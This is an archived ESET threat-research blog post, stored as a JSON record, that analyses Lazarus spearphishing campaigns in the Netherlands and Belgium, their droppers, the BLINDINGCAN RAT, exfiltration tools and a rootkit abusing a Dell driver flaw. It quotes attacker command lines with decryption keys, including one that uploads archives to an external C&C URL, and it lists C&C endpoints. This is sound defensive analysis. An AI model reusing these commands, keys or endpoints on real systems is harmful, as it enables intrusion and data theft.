{ "id": "6eb7ca48-a54c-4b37-9dc1-fd4473c6ca14", "created_at": "2026-04-06T00:15:27.654317Z", "updated_at": "2026-04-10T03:38:20.124602Z", "deleted_at": null, "sha1_hash": "4b8619effdbc24352c4c1a3d88459d130f2109bd", "title": "Amazon-themed campaigns of Lazarus in the Netherlands and Belgium", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2715642, "plain_text": "Amazon-themed campaigns of Lazarus in the Netherlands and Belgium\r\nBy Peter Kálnai\r\nArchived: 2026-04-05 12:47:46 UTC\r\nESET researchers uncovered and analyzed a set of malicious tools that were used by the infamous Lazarus APT group in\r\nattacks during the autumn of 2021. The campaign started with spearphishing emails containing malicious Amazon-themed\r\ndocuments and targeted an employee of an aerospace company in the Netherlands, and a political journalist in Belgium. The\r\nprimary goal of the attackers was data exfiltration. Lazarus (also known as HIDDEN COBRA) has been active since at least\r\n2009. It is responsible for high-profile incidents such as both the Sony Pictures Entertainment hack and tens-of-millions-of-dollar cyberheists in 2016, the WannaCryptor (aka WannaCry) outbreak in 2017, and a long history of disruptive attacks\r\nagainst South Korean public and critical infrastructure since at least 2011.\r\nKey findings in this blogpost:\r\nThe Lazarus campaign targeted an employee of an aerospace company in the Netherlands, and a political journalist in\r\nBelgium.\r\nThe most notable tool used in this campaign represents the first recorded abuse of the CVE‑2021‑21551 vulnerability.\r\nThis vulnerability affects Dell DBUtil drivers; Dell provided a security update in May 2021.\r\nThis tool, in combination with the vulnerability, disables the monitoring of all security solutions on compromised\r\nmachines. It uses techniques against Windows kernel mechanisms that have never been observed in malware before.\r\nLazarus also used in this campaign their fully featured HTTP(S) backdoor known as BLINDINGCAN.\r\nThe complexity of the attack indicates that Lazarus consists of a large team that is systematically organized and well\r\nprepared.\r\nBoth targets were presented with job offers – the employee in the Netherlands received an attachment via LinkedIn\r\nMessaging, and the person in Belgium received a document via email. Attacks started after these documents were opened.\r\nThe attackers deployed several malicious tools on each system, including droppers, loaders, fully featured HTTP(S)\r\nbackdoors, HTTP(S) uploaders and downloaders. The commonality between the droppers was that they are trojanized open-source projects that decrypt the embedded payload using modern block ciphers with long keys passed as command line\r\narguments. In many cases, malicious files are DLL components that were side-loaded by legitimate EXEs, but from an\r\nunusual location in the file system.\r\nThe most notable tool delivered by the attackers was a user-mode module that gained the ability to read and write kernel\r\nmemory due to the CVE-2021-21551 vulnerability in a legitimate Dell driver. This is the first ever recorded abuse of this\r\nvulnerability in the wild. The attackers then used their kernel memory write access to disable seven mechanisms the\r\nWindows operating system offers to monitor its actions, like registry, file system, process creation, event tracing etc.,\r\nbasically blinding security solutions in a very generic and robust way.\r\nIn this blogpost, we explain the context of the campaign and provide a detailed technical analysis of all the components.\r\nThis research was presented at this year’s Virus Bulletin conference. Because of the originality, the main focus of the\r\npresentation is on the malicious component used in this attack that uses the Bring Your Own Vulnerable Driver (BYOVD)\r\ntechnique and leverages the aforementioned CVE-2021-21551 vulnerability. Detailed information is available in the white\r\npaper Lazarus \u0026 BYOVD: Evil to the Windows core.\r\nWe attribute these attacks to Lazarus with high confidence, based on the specific modules, the code-signing certificate, and\r\nthe intrusion approach in common with previous Lazarus campaigns like Operation In(ter)ception  and Operation DreamJob.\r\nThe diversity, number, and eccentricity in implementation of Lazarus campaigns define this group, as well as that it\r\nperforms all three pillars of cybercriminal activities: cyberespionage, cybersabotage, and pursuit of financial gain.\r\nInitial access\r\nESET researchers discovered two new attacks: one against personnel of a media outlet in Belgium and one against an\r\nemployee of an aerospace company in the Netherlands.\r\nIn the Netherlands, the attack affected a Windows 10 computer connected to the corporate network, where an employee was\r\ncontacted via LinkedIn Messaging about a supposed potential new job, resulting in an email with a document attachment\r\nbeing sent. We contacted the security practitioner of the affected company, who was able to share the malicious document\r\nwith us. The Word file Amzon_Netherlands.docx sent to the target is merely an outline document with an Amazon logo (see\r\nFigure 1). When opened, the remote template\r\nhttps://thetalkingcanvas[.]com/thetalking/globalcareers/us/5/careers/jobinfo.php?image=\u003cvar\u003e_DO.PROJ (where \u003cvar\u003e is a\r\nseven-digit number) is fetched. We were unable to acquire the content, but we assume that it may have contained a job offer\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 1 of 13\n\nfor the Amazon space program, Project Kuiper. This is a method that Lazarus practiced in the Operation In(ter)ception and\r\nOperation DreamJob campaigns targeting aerospace and defense industries.\r\nFigure 1. Amazon-themed document sent to the target in the Netherlands\r\nWithin hours, several malicious tools were delivered to the system, including droppers, loaders, fully featured HTTP(S)\r\nbackdoors, HTTP(S) uploaders and HTTP(S) downloaders; see the Toolset section.\r\nRegarding the attack in Belgium, the employee of a journalism company (whose email address was publicly available on the\r\ncompany’s website) was contacted via an email message with the lure AWS_EMEA_Legal_.docx attached. Since we didn’t\r\nobtain the document, we know only its name, which suggests it might have been making a job offer in a legal position. After\r\nopening the document, the attack was triggered, but stopped by ESET products immediately, with just one malicious\r\nexecutable involved. The interesting aspect here is that, at that time, this binary was validly signed with a code-signing\r\ncertificate.\r\nAttribution\r\nWe attribute both attacks to the Lazarus group with a high level of confidence. This is based on the following factors, which\r\nshow relationships to other Lazarus campaigns:\r\n1. Malware (the intrusion set):\r\n1. The HTTPS backdoor (SHA‑1: 735B7E9DFA7AF03B751075FD6D3DE45FBF0330A2) has strong\r\nsimilarities with the BLINDINGCAN backdoor, reported by CISA (US-CERT), and attributed to HIDDEN\r\nCOBRA, which is their codename for Lazarus.\r\n2. The HTTP(S) uploader has strong similarities with the tool C:\\ProgramData\\IBM\\~DF234.TMP mentioned in\r\nthe report by HvS Consulting, Section 2.10 Exfiltration.\r\n3. The full file path and name, %ALLUSERSPROFILE%\\Adobe\\Adobe.tmp, is identical to the one reported by\r\nKaspersky in February 2021 in a white paper about Lazarus’s Operation ThreatNeedle, which targets the\r\ndefense industry.\r\n4. The code-signing certificate, which was issued to the US company \"A\" MEDICAL OFFICE, PLLC and used\r\nto sign one of the droppers, was also reported in the campaign against security researchers; see also Lazarus\r\ngroup: 2 TOY GUYS campaign, ESET Threat report 2021 T1, Page 11.\r\n5. An unusual type of encryption was leveraged in the tools of this Lazarus campaign: HC-128. Other less\r\nprevalent ciphers used by Lazarus in the past: a Spritz variant of RC4 in the watering hole attacks against\r\nPolish and Mexican banks; later Lazarus used a modified RC4 in Operation In(ter)ception; a modified A5/1\r\nstream cipher was used in WIZVERA VeraPort supply-chain attack.\r\n2. Infrastructure:\r\n1. For the first-level C\u0026C server, the attackers do not use their own servers, but hack existing ones instead. This\r\nis a typical, yet weak-confidence behavior of Lazarus.\r\nOne of the typical traits of Lazarus is its delivery of the final payload in the form of a sequence of two or three stages. It\r\nstarts with a dropper – usually a trojanized open-source application – that decrypts the embedded payload with a modern\r\nblock cipher like AES-128 (which is not unusual for Lazarus, e.g., Operation Bookcodes, or an obfuscated XOR, after\r\nparsing the command line arguments for a strong key. Despite the embedded payload not being dropped onto the file system\r\nbut loaded directly into memory and executed, we denote such malware as a dropper. Malware that doesn’t have an\r\nencrypted buffer, but that loads a payload from a filesystem, we denote as a loader.\r\nThe droppers may (Table 1) or may not (Table 2) be side-loaded by a legitimate (Microsoft) process. In the first case here,\r\nthe legitimate application is at an unusual location and the malicious component bears the name of the corresponding DLL\r\nthat is among the application’s imports. For example, the malicious DLL coloui.dll is side-loaded by a legitimate system\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 2 of 13\n\napplication Color Control Panel (colorcpl.exe), both located at C:\\ProgramData\\PTC\\. However, the usual location for this\r\nlegitimate application is %WINDOWS%\\System32\\.\r\nIn all cases, at least one command line argument is passed during runtime that serves as an external parameter required to\r\ndecrypt the embedded payload. Various decryption algorithms are used; see the last column in Table 1 and Table 2. In\r\nseveral cases when AES-128 is used, there’s also an internal, hardcoded parameter together with the name of the parent\r\nprocess and its DLL name, all required for successful decryption.\r\nTable 1. Malicious DLLs side-loaded by a legitimate process from an unusual location\r\nLocation folder\r\nLegitimate\r\nparent process\r\nMalicious\r\nside-loaded\r\nDLL\r\nTrojanized project External parameter\r\nC:\\ProgramData\\PTC\\ colorcpl.exe colorui.dll\r\nlibcrypto of LibreSSL\r\n2.6.5\r\nBE93E050D9C0EAEB1F0E6A\r\n(Loads BLINDINGCAN)\r\nC:\\Windows\\Vss\\ WFS.exe credui.dll\r\nGOnpp v1.2.0.0\r\n(Notepad++ plug‑in)\r\nA39T8kcfkXymmAcq\r\n(Loads the intermediate loader)\r\nC:\\Windows\\security\\ WFS.exe credui.dll\r\nFingerText 0.56.1\r\n(Notepad++ plug‑in)\r\nN/A\r\nC:\\ProgramData\\Caphyon\\ wsmprovhost.exe mi.dll lecui 1.0.0 alpha 10 N/A\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ SMSvcHost.exe cryptsp.dll lecui 1.0.0 alpha 10 N/A\r\nTable 2. Other malware involved in the attack\r\nLocation folder Malware\r\nTrojanized\r\nproject\r\nExternal parameter\r\nDecryption\r\nalgorithm\r\nC:\\PublicCache\\ msdxm.ocx libpcre 8.44\r\n93E41C6E20911B9B36BC\r\n(Loads the HTTP(S) downloader)\r\nXOR\r\nC:\\ProgramData\\Adobe\\ Adobe.tmp\r\nSQLite\r\n3.31.1\r\nS0RMM‑50QQE‑F65DN‑DCPYN‑5QEQA\r\n(Loads the HTTP(S) updater)\r\nXOR\r\nC:\\PublicCache\\ msdxm.ocx sslSniffer Missing HC-128\r\nAfter successful decryption, the buffer is checked for the proper PE format and execution is passed to it. This procedure can\r\nbe found in most of the droppers and loaders. The beginning of it can be seen in Figure 2.\r\nFigure 2. The decrypted buffer is a 64-bit executable\r\nHTTP(S) backdoor: BLINDINGCAN\r\nWe identified a fully featured HTTP(S) backdoor – a RAT known as BLINDINGCAN – used in the attack.\r\nThis payload’s dropper was executed as %ALLUSERSPROFILE%\\PTC\\colorui.dll; see Table 1 for details. The payload is\r\nextracted and decrypted using a simple XOR but with a long key, which is a string built by concatenating the name of the\r\nparent process, is own filename, and the external command line parameter – here\r\nCOLORCPL.EXECOLORUI.DLLBE93E050D9C0EAEB1F0E6AE13C1595B5.\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 3 of 13\n\nThe payload, SHA-1: 735B7E9DFA7AF03B751075FD6D3DE45FBF0330A2, is a 64-bit VMProtect-ed DLL. A connection\r\nis made to one of the remote locations https://aquaprographix[.]com/patterns/Map/maps.php or https://turnscor[.]com/wp-includes/feedback.php. Within the virtualized code we pivoted via the following very specific RTTI artifacts found in the\r\nexecutable: .?AVCHTTP_Protocol@@, .?AVCFileRW@@. Moreover, there’s a similarity on the code level, as the indices\r\nof the commands start with the same value, 8201; see Figure 3. This helped us to identify this RAT as BLINDINGCAN\r\n(SHA-1: 5F4FBD57319BD0D2DF31131E864FDDA9590A652D), reported for the first time by CISA. The recent version\r\nof this payload was observed in another Amazon-themed campaign, where BLINDINGCAN was dropped by a trojanized\r\nPutty-0.77 client: see Mandiant’s blog.\r\nFigure 3. Code comparison of plain (upper, unprotected) and virtualized (lower, VMProtect-ed) variants of BLINDINGCAN,\r\nwith an agreement of two command indices, 8256 and 8201\r\nBased on the number of command codes that are available to the operator, it is likely that a server-side controller is available\r\nwhere the operator can control and explore compromised systems. Actions made within this controller probably result in the\r\ncorresponding command IDs and their parameters being sent to the RAT running on the target’s system. The list of\r\ncommand codes is in Table 3 and agrees with the analysis done by JPCERT/CC, Appendix C. There are no validation checks\r\nof parameters like folder or filenames. That means all the checks have to be implemented on the server side, which suggests\r\nthat the server-side controller is a complex application, very likely with a user-friendly GUI.\r\nTable 3. The RAT’s commands\r\nCommand Description\r\n8201 Send system information like computer name, Windows version, and the code page.\r\n8208 Get the attributes of all files in mapped RDP folders (\\\\tsclient\\C etc.).\r\n8209 Recursively get the attributes of local files.\r\n8210 Execute a command in the console, store the output to a temporary file, and upload it.\r\n8211 Zip files in a temporary folder and upload them.\r\n8212 Download a file and update its time information.\r\n8214 Create a new process in the console and collect the output.\r\n8215\r\nCreate a new process in the security context of the user represented by the specified token and collect the\r\noutput.\r\n8217 Recursively create a process tree list.\r\n8224 Terminate a process.\r\n8225 Delete a file securely.\r\n8226\r\nEnable nonblocking I/O via TCP socket (socket(AF_INET , SOCK_STREAM , IPPROTO_TCP) with\r\nthe FIONBIO control code).\r\n8227 Set the current directory for the current process.\r\n8231 Update the time information of the selected file.\r\n8241 Send the current configuration to the C\u0026C server.\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 4 of 13\n\nCommand Description\r\n8242 Update the configuration.\r\n8243 Recursively list the directory structure.\r\n8244 Get type and free disk space of a drive.\r\n8249 Continue with the next command.\r\n8256 Request another command from the C\u0026C server.\r\n8262 Rewrite a file without changing its last write time.\r\n8264 Copy a file to another destination.\r\n8265 Move a file to another destination.\r\n8272 Delete a file.\r\n8278 Take a screenshot.\r\nIntermediate loader\r\nNow we describe a three-stage chain where, unfortunately, we were able to identify only the first two steps: a dropper and an\r\nintermediate loader.\r\nThe first stage is a dropper located at C:\\Windows\\Vss\\credui.dll and was run via a legitimate – but vulnerable to DLL\r\nsearch-order hijacking – application with the (external) parameter C:\\Windows\\Vss\\WFS.exe A39T8kcfkXymmAcq. The\r\nprogram WFS.exe is a copy of the Windows Fax and Scan application, but its standard location is\r\n%WINDOWS%\\System32\\.\r\nThe dropper is a trojanized GOnpp plug-in for Notepad++, written in the Go programming language. After the decryption,\r\nthe dropper checks whether the buffer is a valid 64-bit executable and then, if so, loads it into memory, so that the second\r\nstage is ready for execution.\r\nThe goal of this intermediate stage is to load an additional payload in memory and execute it. It performs this task in two\r\nsteps. It first reads and decrypts the configuration file C:\\windows\\System32\\wlansvc.cpl, which is not, as its extension\r\nmight suggest, an (encrypted) executable, but a data file containing chunks of 14944 bytes with configuration. We didn’t\r\nhave the particular data from the current attack; however, we obtained such configuration from another Lazarus attack: see\r\nFigure 5.The configuration is expected to start with a double word representing the total size of the remaining buffer (see\r\nLine 69 in Figure 4 below and the variable u32TotalSize), followed by an array of 14944 byte-long structures containing at\r\nleast two values: the name of the loading DLL as a placeholder for identifying the rest of the configuration (at the offset 168\r\nof Line 74 in Figure 4 and the highlighted member in Figure 5).\r\nFigure 4. The first step of decrypting the configuration file and checking if the name of the loading DLL matches the\r\nexpected one\r\nThe second step is the action of reading, decrypting, and loading this file that represents very likely the third and final stage.\r\nIt is expected to be a 64-bit executable and is loaded into the memory the same way the first-stage dropper handled the\r\nintermediate loader. At the start of execution, a mutex is created as a concatenation of the string\r\nGlobal\\AppCompatCacheObject and the CRC32 checksum of its DLL name (credui.dll) represented as a signed integer. The\r\nvalue should equal Global\\AppCompatCacheObject-1387282152 if wlansvc.cpl exists and -1387282152 otherwise.\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 5 of 13\n\nFigure 5. A configuration of the intermediate loader. The highlighted file name is expected to match with the name of the\r\nrunning malware; see also Figure 4.\r\nAn interesting fact is the use of this decryption algorithm (Figure 4, Line 43 \u0026 68), which is not that prevalent in the\r\nLazarus toolset nor malware in general. The constants 0xB7E15163 and 0x61C88647 (which is -0x9E3779B9; see Figure 6,\r\nLine 29 \u0026 35) in the key expansion suggests that it’s either the RC5 or RC6 algorithm. By checking the main decryption\r\nloop of the algorithm, one identifies that it’s the more complex of the two, RC6. An example of a sophisticated threat using\r\nsuch uncommon encryption is Equations Group’s BananaUsurper; see Kaspersky’s report from 2016.\r\nFigure 6. Key expansion of RC6\r\nHTTP(S) downloader\r\nA downloader using the HTTP(S) protocols was delivered onto the target’s system as well.\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 6 of 13\n\nIt was installed by a first stage dropper (SHA1: 001386CBBC258C3FCC64145C74212A024EAA6657), which is a\r\ntrojanized libpcre-8.44 library. It was executed by the command\r\ncmd.exe /c start /b rundll32.exe C:\\PublicCache\\msdxm.ocx,sCtrl 93E41C6E20911B9B36BC\r\n(the parameter is an XOR key for extracting the embedded payload; see Table 2). The dropper also achieves persistence by\r\ncreating the OneNoteTray.LNK file located in the %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup folder.\r\nThe second stage is a 32-bit VMProtect-ed module that makes an HTTP connection request to a C\u0026C server stored in its\r\nconfiguration; see Figure 7. It uses the same User Agent – Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95\r\nSafari/537.36 – as BLINDINGCAN RAT, contains the RTTI artifact .?AVCHTTP_Protocol@@ but not .?AVCFileRW@@,\r\nand lacks features like taking screenshots, archiving files, or executing a command via the command line. It is able to load\r\nan executable to a newly allocated memory block and pass code execution to it.\r\nFigure 7. A configuration of the HTTP(S) downloader. The highlighted values are the size of the configuration and the\r\nnumber of URLs. In the attack we observed, all the URLs were identical.\r\nHTTP(S) uploader\r\nThis Lazarus tool is responsible for data exfiltration, by using the HTTP or HTTPS protocols.\r\nIt is delivered in two stages as well. The initial dropper is a trojanized sqlite-3.31.1 library. Lazarus samples usually don’t\r\ncontain a PDB path, but this loader has one, W:\\Develop\\Tool\\HttpUploader\\HttpPOST\\Pro\\_BIN\\RUNDLL\\64\\sqlite3.pdb,\r\nwhich also suggests its functionality immediately – a HTTP Uploader.\r\nThe dropper expects multiple command line parameters: one of them is a password required to decrypt and load the\r\nembedded payload; the rest of parameters are passed to the payload. We didn’t catch the parameters, but luckily an in-the-wild use of this tool was observed in a forensic investigation by HvS Consulting:\r\nC:\\ProgramData\\IBM\\~DF234.TMP S0RMM-50QQE-F65DN-DCPYN-5QEQA\r\nhttps://www.gonnelli.it/uploads/catalogo/thumbs/thumb.asp C:\\ProgramData\\IBM\\restore0031.dat data03 10000 -p\r\n192.168.1.240 8080\r\nThe first parameter, S0RMM-50QQE-F65DN-DCPYN-5QEQA, worked as a key for the decryption routine of the dropper\r\n(to be more precise, an obfuscation was performed first, where the encrypted buffer was XOR-ed with its copy shifted by\r\none byte; then an XOR decryption with the key followed). The rest of the parameters are stored in a structure and passed to\r\nthe second stage. For the explanation of their meanings, see Table 4.\r\nTable 4. Command line parameters for the HTTP(S) updater\r\nParameter Value Explanation\r\n1 S0RMM-50QQE-F65DN-DCPYN-5QEQA A 29-byte decryption key.\r\n2 https://\u003c...\u003e C\u0026C for data exfiltration.\r\n3 C:\\ProgramData\\IBM\\restore0031.dat The name of a local RAR volume.\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 7 of 13\n\nParameter Value Explanation\r\n4 data03 The name of the archive on the server side.\r\n5 10,000 The size of a RAR split (max 200,000 kB).\r\n6 N/A Starting index of a split.\r\n7 N/A Ending index of a split.\r\n8 -p 192.168.1.240 8080 A switch -p\r\n9 #rowspan# Proxy IP address\r\n10 #rowspan# Proxy Port\r\nThe second stage is the HTTP uploader itself. The only parameter for this stage is a structure containing the C\u0026C server for\r\nthe exfiltration, the filename of a local RAR archive, the root name of a RAR archive on the server-side, the total size of a\r\nRAR split in kilobytes, an optional range of split indices, and an optional -p switch with the internal proxy IP and a port; see\r\nTable 4. For example, if the RAR archive is split into 88 chunks, each 10,000 kB large, then the uploader would submit\r\nthese splits and store them on the server side under names data03.000000.avi, data03.000001.avi, …, data03.000087.avi.\r\nSee Figure 8, Line 42 where these strings are formatted.\r\nThe User-Agent is the same as for BLINDINGCAN and the HTTP(S) downloader,  Mozilla/5.0 (Windows NT 6.1;\r\nWOW64) Chrome/28.0.1500.95 Safari/537.36.\r\nFigure 8. The exfiltration of RAR splits to a C\u0026C server\r\nFudModule Rootkit\r\nWe identified a dynamically linked library with the internal name FudModule.dll that tries to disable various Windows\r\nmonitoring features. It does so by modifying kernel variables and removing kernel callbacks, which is possible because the\r\nmodule acquires the ability to write in the kernel by leveraging the BYOVD techniques - the specific CVE-2021-21551\r\nvulnerability in the Dell driver dbutil_2_3.sys.\r\nThe full analysis of this malware is available as a VB2022 paper Lazarus \u0026 BYOVD: evil to the Windows core.\r\nOther malware\r\nAdditional droppers and loaders were discovered in the attacks, but we didn’t obtain the necessary parameters to decrypt the\r\nembedded payloads or encrypted files.\r\nTrojanized lecui\r\nA project lecui by Alec Musafa served the attackers as a code base for trojanization of two additional loaders. By their\r\nfilenames, they were disguised as Microsoft libraries mi.dll (Management Infrastructure) and cryptsp.dll (Cryptographic\r\nService Provider API), respectively, and this was due to the intended side-loading by the legitimate applications\r\nwsmprovhost.exe and SMSvcHost.exe, respectively; see Table 1.\r\nThe main purpose of these loaders is to read and decrypt executables located in alternate data streams (ADS) at\r\nC:\\ProgramData\\Caphyon\\mi.dll:Zone.Identifier and C:\\Program Files\\Windows Media\r\nPlayer\\Skins\\DarkMode.wmz:Zone.Identifier, respectively. Since we haven’t acquired these files, it’s not known which\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 8 of 13\n\npayload is hidden there; however, the only certainty is that it’s an executable, since the loading process follows the\r\ndecryption (see Figure 2). The use of ADS is not new, because Ahnlab reported a Lazarus attack against South Korean\r\ncompanies in June 2021 involving such techniques.\r\nTrojanized FingerText\r\nESET blocked an additional trojanized open-source application, FingerText 0.5.61 by erinata, located at\r\n%WINDIR%\\security\\credui.dll. The correct command line parameters are not known. As in some of the previous cases,\r\nthree parameters were required for the AES-128 decryption of the embedded payload: the parent process’s name, WFS.exe;\r\nthe internal parameter, mg89h7MsC5Da4ANi; and the missing external parameter.\r\nTrojanized sslSniffer\r\nThe attack against a target in Belgium was blocked early in its deployment chain so only one file was identified, a 32-bit\r\ndropper located at C:\\PublicCache\\msdxm.ocx. It is an sslSniffer component from the wolfSSL project that has been\r\ntrojanized. At the time of the attack, it was validly signed with a certificate issued to \"A\" MEDICAL OFFICE, PLLC (see\r\nFigure 8), which has since expired.\r\nFigure 9. Validly signed but already expired certificate\r\nIt has two malicious exports that the legitimate DLL doesn’t have: SetOfficeCertInit and SetOfficeCert. Both exports require\r\nexactly two parameters. The purpose of the first export is to establish persistence by creating OfficeSync.LNK, located in\r\n%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup, pointing to the malicious DLL and running its second\r\nexport via rundll32.exe with the parameters passed to itself.\r\nThe second export, SetOfficeCert, uses the first parameter as a key to decrypt the embedded payload, but we couldn’t extract\r\nit, because the key is not known to us.\r\nThe decryption algorithm is also interesting as the attackers use HC-128 with the 128-bit key as the first parameter and for\r\nits 128-bit initialization vector, the string ffffffffffffffff. The constants revealing the cipher are displayed in Figure 10.\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 9 of 13\n\nFigure 10. The key setup with highlighted constants suggesting the HC-128 cipher\r\nConclusion\r\nIn this attack, as well as in many others attributed to Lazarus, we saw that many tools were distributed even on a single\r\ntargeted endpoint in a network of interest. Without a doubt, the team behind the attack is quite large, systematically\r\norganized, and well prepared. For the first time in the wild, the attackers were able to leverage CVE-2021-21551 for turning\r\noff the monitoring of all security solutions. It was not just done in kernel space, but also in a robust way, using a series of\r\nlittle- or undocumented Windows internals. Undoubtedly this required deep research, development, and testing skills.\r\nFrom the defenders’ point of view, it seems easier to limit the possibilities of initial access than to block the robust toolset\r\nthat would be installed after determined attackers gain a foothold in the system. As in many cases in the past, an employee\r\nfalling prey to the attackers’ lure was the initial point of failure here. In sensitive networks, companies should insist that\r\nemployees not pursue their personal agendas, like job hunting, on devices belonging to their company’s infrastructure.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\r\nESET Research now also offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the\r\nESET Threat Intelligence page.\r\nIoCs\r\nA comprehensive list of Indicators of Compromise and samples can be found in our GitHub repository.\r\nSHA-1 Filename Detection Description\r\n296D882CB926070F6E43C99B9E1683497B6F17C4 FudModule.dll Win64/Rootkit.NukeSped.A\r\nA user‑mode module th\r\nkernel memory.\r\n001386CBBC258C3FCC64145C74212A024EAA6657 C:\\PublicCache\\msdxm.ocx Win32/NukeSped.KQ A dropper of the HTTP(\r\n569234EDFB631B4F99656529EC21067A4C933969 colorui.dll Win64/NukeSped.JK\r\nA dropper of BLINDIN\r\nby a legitimate colorcpl\r\n735B7E9DFA7AF03B751075FD6D3DE45FBF0330A2 N/A Win64/NukeSped.JK\r\nA 64-bit variant of the B\r\nRAT.\r\n4AA48160B0DB2F10C7920349E3DCCE01CCE23FE3 N/A Win32/NukeSped.KQ An HTTP(S) download\r\nC71C19DBB5F40DBB9A721DC05D4F9860590A5762 Adobe.tmp Win64/NukeSped.JD A dropper of the HTTP(\r\n97DAAB7B422210AB256824D9759C0DBA319CA468 credui.dll Win64/NukeSped.JH A dropper of an interme\r\nFD6D0080D27929C803A91F268B719F725396FE79 N/A Win64/NukeSped.LP An HTTP(S) uploader.\r\n83CF7D8EF1A241001C599B9BCC8940E089B613FB N/A Win64/NukeSped.JH\r\nAn intermediate loader\r\nadditional payload from\r\nC948AE14761095E4D76B55D9DE86412258BE7AFD DBUtil_2_3.sys Win64/DBUtil.A\r\nA legitimate vulnerable\r\ndropped by FudModule\r\n085F3A694A1EECDE76A69335CD1EA7F345D61456 cryptsp.dll Win64/NukeSped.JF\r\nA dropper in the form o\r\nlibrary.\r\n55CAB89CB8DABCAA944D0BCA5CBBBEB86A11EA12 mi.dll Win64/NukeSped.JF\r\nA dropper in the form o\r\nlibrary.\r\n806668ECC4BFB271E645ACB42F22F750BFF8EE96 credui.dll Win64/NukeSped.JC\r\nA trojanized FingerText\r\nNotepad++.\r\nBD5DCB90C5B5FA7F5350EA2B9ACE56E62385CA65 msdxm.ocx Win32/NukeSped.KT\r\nA trojanized version of\r\nsslSniffer.\r\nNetwork\r\nIP Provider First seen Details\r\n67.225.140[.]4 Liquid Web, L.L.C 2021‑10‑12\r\nA compromised legitimate WordPress-based site hosting\r\nthe C\u0026C server\r\nhttps://turnscor[.]com/wp-includes/feedback.php\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 10 of 13\n\nIP Provider First seen Details\r\n50.192.28[.]29\r\nComcast Cable\r\nCommunications, LLC\r\n2021‑10‑12\r\nA compromised legitimate site hosting the C\u0026C server\r\nhttps://aquaprographix[.]com/patterns/Map/maps.php\r\n31.11.32[.]79 Aruba S.p.A. 2021‑10‑15\r\nA compromised legitimate site hosting the C\u0026C server\r\nhttp://www.stracarrara[.]org/images/img.asp\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 11 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nExecution\r\nT1106 Native API\r\nThe Lazarus HTTP(S) backdoor uses the Windows API\r\nto create new processes.\r\nT1059.003\r\nCommand and Scripting\r\nInterpreter: Windows\r\nCommand Shell\r\nHTTP(S) backdoor malware uses cmd.exe to execute\r\ncommand-line tools\r\nDefense\r\nEvasion\r\nT1140\r\nDeobfuscate/Decode Files\r\nor Information\r\nMany of the Lazarus tools are stored in an encrypted\r\nstate on the file system.\r\nT1070.006\r\nIndicator Removal on\r\nHost: Timestomp\r\nThe Lazarus HTTP(S) backdoor can modify the file time\r\nattributes of a selected file.\r\nT1574.002\r\nHijack Execution\r\nFlow: DLL Side-Loading\r\nMany of the Lazarus droppers and loaders use a\r\nlegitimate program for their loading.\r\nT1014 Rootkit\r\nThe user-to-kernel module of Lazarus can turn off\r\nmonitoring features of the OS.\r\nT1027.002\r\nObfuscated Files or\r\nInformation: Software\r\nPacking\r\nLazarus uses Themida and VMProtect to obfuscate their\r\nbinaries\r\nT1218.011\r\nSystem Binary Proxy\r\nExecution: Rundll32\r\nLazarus uses rundll32.exe to execute its malicious DLLs\r\nCommand\r\nand Control\r\nT1071.001\r\nApplication Layer\r\nProtocol: Web Protocols\r\nThe Lazarus HTTP(S) backdoor uses HTTP and HTTPS\r\nto communicate with its C\u0026C servers.\r\nT1573.001\r\nEncrypted Channel:\r\nSymmetric Cryptography\r\nThe Lazarus HTTP(S) backdoor encrypts C\u0026C traffic\r\nusing the AES-128 algorithm.\r\nT1132.001\r\nData Encoding: Standard\r\nEncoding\r\nThe Lazarus HTTP(S) payloads encode C\u0026C traffic\r\nusing the base64 algorithm.\r\nExfiltration T1560.002\r\nArchive Collected Data:\r\nArchive via Library\r\nThe Lazarus HTTP(S) uploader can zip files of interest\r\nand upload them to its C\u0026C.\r\nResource\r\nDevelopment\r\nT1584.004\r\nAcquire\r\nInfrastructure: Server\r\nCompromised servers were used by all the Lazarus\r\nHTTP(S) backdoor, uploader, and downloader as a C\u0026C.\r\nDevelop\r\nCapabilities\r\nT1587.001 Malware\r\nCustom tools from the attack are likely developed by the\r\nattackers. Some exhibit highly specific kernel\r\ndevelopment capacities seen earlier in Lazarus tools.\r\nExecution T1204.002\r\nUser Execution:\r\nMalicious File\r\nThe target was lured to open a malicious Word\r\ndocument.\r\nInitial Access\r\nT1566.003\r\nPhishing: Spearphishing\r\nvia Service\r\nThe target was contacted via LinkedIn Messaging.\r\nT1566.001\r\nPhishing: Spearphishing\r\nAttachment\r\nThe target received a malicious attachment.\r\nPersistence\r\nT1547.006\r\nBoot or Logon Autostart\r\nExecution: Kernel\r\nModules and Extensions\r\nThe BYOVD DBUtils_2_3.sys was installed to start via\r\nthe Boot loader (value 0x00 in the Start key 